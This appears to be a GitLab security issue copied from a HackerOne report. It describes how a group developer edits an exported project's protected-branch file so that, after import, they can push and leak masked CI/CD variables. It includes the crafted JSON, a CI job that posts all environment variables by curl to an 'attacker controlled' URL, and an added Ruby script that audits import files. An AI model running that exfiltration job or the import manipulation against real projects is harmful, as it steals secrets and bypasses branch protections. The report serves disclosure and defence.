User with developer role (group) can modify Protected branches setting on imported project and leak group CI/CD variables

Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #1939987 by js_noob on 2023-04-09, assigned to @fvpotvin:

Report

Summary

Hello team, a user with a developer role (group) can steal masked group/project CI/CD variables by modifying Project settings -> Protected branches on an imported project (tree/project/protected_branches.ndjson file). This is done with no victim interaction needed.

Steps to reproduce
  1. Create 2 accounts
  2. Create a group with account A and masked CI/CD group variables (Group settings -> CI/CD -> Variables)

  3. Create a personal project with account B and export it
  4. Invite account B (developer) to account A's (owner) group
  5. With account B, modify the project import file, go to tree/project/protected_branches.ndjson
  6. Set all occurrences of access_level to null and all occurrences of user_id to the developer's user id; it will look similar to this:

     ```json
     {"project_id":44833383,"name":"main","created_at":"2023-04-02T13:43:17.065Z","updated_at":"2023-04-02T13:43:17.065Z","code_owner_approval_required":false,"allow_force_push":false,"merge_access_levels":[{"access_level":null,"created_at":"2023-04-02T13:43:17.067Z","updated_at":"2023-04-02T13:43:17.067Z","user_id":12794759,"group_id":null}],"push_access_levels":[{"access_level":null,"created_at":"2023-04-02T13:43:17.069Z","updated_at":"2023-04-02T13:43:17.069Z","user_id":12794759,"group_id":null}],"unprotect_access_levels":[]}
     ```

  7. Tar the changes and upload the modified project to account A's group with account B
  8. The default access should be to maintainers only; however, it is fully accessible by the developer

  9. Create a .gitlab-ci.yml file with the following content:

     ```yaml
     image: ruby:latest

     job_name:
       script:
         - export > test.txt
         - curl -X POST --data "$(cat test.txt)" (attacker controlled website's url)
     ```

  10. Commit and verify the group CI/CD variables are being disclosed

For simplicity you can create the vars in step 2 unmasked and in the .gitlab-ci.yml you have the following content:

```yaml
image: ruby:latest

job_name:
  script:
    - echo $VAR
```

Just to make things easier so we don't require a server.

Reference

#353958 (closed)

Video/POC

Redacted

Impact

Users with the developer role (group) can steal masked group and project CI/CD variables. The developer can also modify the main branch without the maintainer's permission.
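A defender-side check for the import file described in steps 5 and 6, added here as an example and not GitLab's own code: it audits the protected-branch lines of a project export before the archive is trusted and flags any grant that hands branch access to a user the group has not vetted (the null access_level / user_id pattern above), any group-specific grant, and any role grant below Maintainer. The sample lines and the allowed_user_ids list are constructed assumptions.

```ruby
require "json"

# Constructed sample in the shape of tree/project/protected_branches.ndjson:
# "main" carries the two user-specific grants from the report, "release" is
# a normal Maintainer-only branch, "develop" has a role grant at Developer.
SAMPLE_NDJSON = <<~NDJSON
  {"name":"main","merge_access_levels":[{"access_level":null,"user_id":12794759,"group_id":null}],"push_access_levels":[{"access_level":null,"user_id":12794759,"group_id":null}],"unprotect_access_levels":[]}
  {"name":"release","merge_access_levels":[{"access_level":40,"user_id":null,"group_id":null}],"push_access_levels":[{"access_level":40,"user_id":null,"group_id":null}],"unprotect_access_levels":[]}
  {"name":"develop","merge_access_levels":[{"access_level":30,"user_id":null,"group_id":null}],"push_access_levels":[],"unprotect_access_levels":[]}
NDJSON

MAINTAINER = 40 # GitLab role access levels: Developer 30, Maintainer 40, Owner 50

# Audit protected-branch grants in an export before importing it.
# allowed_user_ids: users the importing group explicitly permits as
# branch-specific grantees (assumption: supplied by the reviewer).
# Returns an array of finding strings; an empty array means nothing suspicious.
def audit_protected_branches(ndjson, allowed_user_ids: [])
  findings = []
  ndjson.each_line do |raw|
    line = raw.strip
    next if line.empty?

    branch = JSON.parse(line)
    %w[merge_access_levels push_access_levels unprotect_access_levels].each do |kind|
      Array(branch[kind]).each do |grant|
        level, uid, gid = grant.values_at("access_level", "user_id", "group_id")
        where = "#{branch['name']}/#{kind}"
        if uid.nil? && gid.nil?
          # Plain role grant: must be present and at least Maintainer.
          if level.nil? || level < MAINTAINER
            findings << "#{where}: role grant below Maintainer (#{level.inspect})"
          end
        elsif !uid.nil? && !allowed_user_ids.include?(uid)
          # User-specific grant to someone the group never approved.
          findings << "#{where}: user-specific grant to unvetted user_id #{uid}"
        elsif !gid.nil?
          findings << "#{where}: group-specific grant to group_id #{gid}, verify manually"
        end
      end
    end
  end
  findings
end

puts audit_protected_branches(SAMPLE_NDJSON) if __FILE__ == $0
```

Run against a real export after extracting the archive, pointing it at tree/project/protected_branches.ndjson and passing the user ids your group actually approves.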

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

How To Reproduce

Please add reproducibility information to this section:

Edited by Félix Veillette-Potvin